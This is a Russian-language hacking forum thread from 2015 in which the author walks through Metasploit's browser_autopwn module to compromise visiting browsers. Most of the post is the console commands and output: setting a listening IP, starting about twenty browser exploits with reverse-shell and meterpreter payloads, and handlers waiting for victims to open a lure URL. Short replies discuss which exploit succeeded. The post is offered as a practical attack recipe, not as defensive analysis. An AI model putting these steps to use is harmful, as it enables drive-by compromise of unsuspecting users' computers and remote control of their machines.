Маленькая пакость

DarckSol · 04.05.2015

Всем привет. Сегодня расскажу о маленькой гадости, протестил сегодня утром...
И так, начнём.

Состав ПО: Linux Ubuntu 14.04 + Metasploit the latest updates.

Атакуемая ОС: Windows 7 _ x64 the latest updates + Chrome Версия 42.0.2311.135 m.

############################################################

Start!

[*] Starting the Metasploit Framework console...|
_ _
/ \ /\    __    _   __ /_/ __
| |\ / | _____   \ \    ___   _____ | | / \ _   \ \
| | \/| | | ___\ |- -|   /\ / __\ | -__/ | || | || | |- -|
|_|   | | | _|__ | |_ / -\ __\ \   | | | | \__/| | | |_
|/ |____/ \___\/ /\ \\___/   \/    \__| |_\ \___\

   =[ metasploit v4.11.0-dev [core:4.11.0.pre.dev api:1.0.0]]
+ -- --=[ 1449 exploits - 826 auxiliary - 229 post ]
+ -- --=[ 378 payloads - 37 encoders - 8 nops    ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf >

PS: Мне лениво описывать весь процесс, пойдём простым путём с использование BrowserAutoPWN, это модуль метасплоита, который запускает пачку сплоитов для проверки браузеров на уязвимости. Оно то нам и надо!
И так, используем его!

use auxiliary/server/browser_autopwn

Смотрим опции модуля:

msf auxiliary(browser_autopwn) > show options

Module options (auxiliary/server/browser_autopwn):

   Name    Current Setting Required Description
   ----    --------------- -------- -----------
   LHOST    yes    The IP address to use for reverse-connect payloads
   SRVHOST 0.0.0.0 yes    The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT 8080    yes    The local port to listen on.
   SSL false no Negotiate SSL for incoming connections
   SSLCert    no Path to a custom SSL certificate (default is randomly generated)
   URIPATH    no The URI to use for this exploit (default is random)

Auxiliary action:

   Name    Description
   ----    -----------
   WebServer Start a bunch of modules and direct clients to appropriate exploits

Основные параметры, необходимые для заполнение: LHOST, SRVHOST. Для формирования адекватной,не случайной, ссылки для входа, URIPach = /dlab.org;

**После установки настроек, запускаем модуль:

msf auxiliary(browser_autopwn) > set srvhost YouIP //IP Сервера
srvhost => 46.242.9.157
msf auxiliary(browser_autopwn) > set lhost YouIP IP для коннекта к Вам после пробива
lhost => 46.242.9.157
msf auxiliary(browser_autopwn) > set uripath /dlab.org //Префикс ссылки
uripath => /dlab.org
msf auxiliary(browser_autopwn) > run //Запуск модуля /~/ эксплоита

модуль запускается не очень то быстро, ведь он поднимает 20 сплоитов... после запускай, вы увидите примерно такой ответ сервера:

[*] Auxiliary module execution completed

[*] Setup
msf auxiliary(browser_autopwn) >
[*] Starting exploit modules on host YouIP...
[*] ---

[*] Starting exploit android/browser/webview_addjavascriptinterface with payload android/meterpreter/reverse_tcp
[*] Using URL: http://YouIP:8080/ahYwRSEyr
[*] Server started.
[*] Starting exploit multi/browser/firefox_proto_crmfrequest with payload generic/shell_reverse_tcp
[*] Using URL: http://YouIP:8080/KTZLJcCiqGhli
[*] Server started.
[*] Starting exploit multi/browser/firefox_tostring_console_injection with payload generic/shell_reverse_tcp
[*] Using URL: http://YouIP:8080/IeMhB
[*] Server started.
[*] Starting exploit multi/browser/firefox_webidl_injection with payload generic/shell_reverse_tcp
[*] Using URL: http://YouIP:8080/MZNLcAAedDOVA
[*] Server started.
[*] Starting exploit multi/browser/java_atomicreferencearray with payload java/meterpreter/reverse_tcp
[*] Using URL: http://YouIP:8080/rktkEdQX
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_jmxbean with payload java/meterpreter/reverse_tcp
[*] Using URL: http://YouIP:8080/TPGQJvgSfNQCF
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_provider_skeleton with payload java/meterpreter/reverse_tcp
[*] Using URL: http://YouIP:8080/uFOz
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_reflection_types with payload java/meterpreter/reverse_tcp
[*] Using URL: http://YouIP:8080/nAHBHvsgCRPK
[*] Server started.
[*] Starting exploit multi/browser/java_rhino with payload java/meterpreter/reverse_tcp
[*] Using URL: http://YouIP:8080/dnQvhAMSw
[*] Server started.
[*] Starting exploit multi/browser/java_verifier_field_access with payload java/meterpreter/reverse_tcp
[*] Using URL: http://YouIP:8080/REiuXJDgovhD
[*] Server started.
[*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp
[*] Using URL: http://YouIP:8080/yzSI
[*] Server started.
[*] Starting exploit windows/browser/adobe_flash_mp4_cprt with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://YouIP:8080/SRgUbQWmZpKC
[*] Server started.
[*] Starting exploit windows/browser/adobe_flash_rtmp with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://YouIP:8080/kkbzUkKQkhN
[*] Server started.
[*] Starting exploit windows/browser/ie_cgenericelement_uaf with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://YouIP:8080/IHCcx
[*] Server started.
[*] Starting exploit windows/browser/ie_createobject with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://YouIP:8080/NWRLjIqi
[*] Server started.
[*] Starting exploit windows/browser/ie_execcommand_uaf with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://YouIP:8080/kijhoMpXkGhqY
[*] Server started.
[*] Starting exploit windows/browser/mozilla_nstreerange with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://YouIP:8080/vJRhDu
[*] Server started.
[*] Starting exploit windows/browser/ms13_080_cdisplaypointer with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://YouIP:8080/YfIoaFpTQn
[*] Server started.
[*] Starting exploit windows/browser/ms13_090_cardspacesigninhelper with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://YouIP:8080/rHjgqcbQAoHMj
[*] Server started.
[*] Starting exploit windows/browser/msxml_get_definition_code_exec with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://YouIP:8080/LFnNpcnMkC
[*] Server started.
[*] Starting handler for windows/meterpreter/reverse_tcp on port 3333
[*] Starting handler for generic/shell_reverse_tcp on port 6666
[*] Started reverse handler on YouIP:3333
[*] Starting the payload handler...
[*] Starting handler for java/meterpreter/reverse_tcp on port 7777
[*] Started reverse handler on YouIP:6666
[*] Starting the payload handler...
[*] Started reverse handler on YouIP:7777
[*] Starting the payload handler...

[*] --- Done, found 20 exploit modules

[*] Using URL: http://YouIP:8080/dlab.org
[*] Server started.

Using URL: http://YouIP:8080/dlab.org

Заходим по ссылке и готова)))))

Код:

Sessions -i 1

FlatL1ne · 04.05.2015

А каким конкретно сплоитом пробивает?

DarckSol · 04.05.2015

Кажись яву бьёт...
Java Applet Rhino Script Engine Remote Code Execution handling request

Хм, но второй раз пробить не получилось... Странно, в первый раз сессию вернули, во второй и последующие разы, облом.... Видимо есть какая то зависимость.....

BabaDook · 06.05.2015

Херня это полная.

DarckSol · 08.05.2015

Ну тут как сказать, с одной стороны, да, но с другой то, меня пробило всё же разок...

Маленькая пакость

DarckSol

(L1) cache

FlatL1ne

RAM

DarckSol

(L1) cache

BabaDook

(L1) cache

DarckSol

(L1) cache